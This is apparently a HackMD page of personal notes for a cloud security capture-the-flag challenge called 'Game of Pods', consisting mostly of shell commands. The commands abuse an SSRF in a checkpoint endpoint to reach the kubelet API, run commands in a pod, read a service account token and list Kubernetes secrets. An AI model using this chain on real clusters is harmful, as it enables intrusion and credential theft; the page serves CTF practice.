Wiz CTF - HackMD

# Game of Pods **URL:** https://cloudsecuritychampionship.com/challenge/5 ## Notes * Kubelet API definitions: [source](https://github.com/kubernetes/kubernetes/blob/release-1.31/pkg/kubelet/server/server.go#L455) ## Commands Startup ```sh apk add vim openssh httpie apk add upterm --repository=https://dl-cdn.alpinelinux.org/alpine/edge/testing ssh-keygen -t rsa -b 4096 -f ~/.ssh/id_rsa -P "" upterm host --github-user patrickpichler --accept -- bash alias k=kubectl ``` List running pods ```sh http POST 10.42.0.4:8080/checkpoint node_ip='172.30.0.2:10250/runningpods/app/..#' | jq ``` Command for RCE ```sh http POST 10.42.0.4:8080/checkpoint node_ip='172.30.0.2:10250/run/app/app-blog/app-blog?cmd=cat%20main.go#' ```` Get token from app ```sh http POST 10.42.0.4:8080/checkpoint node_ip='172.30.0.2:10250/run/app/app-blog/app-blog?cmd=cat%20/var/run/secrets/kubernetes.io/serviceaccount/token#' > app.token export TOKEN=$(cat app.token) kubectl --token "$TOKEN" get secrets -n app ```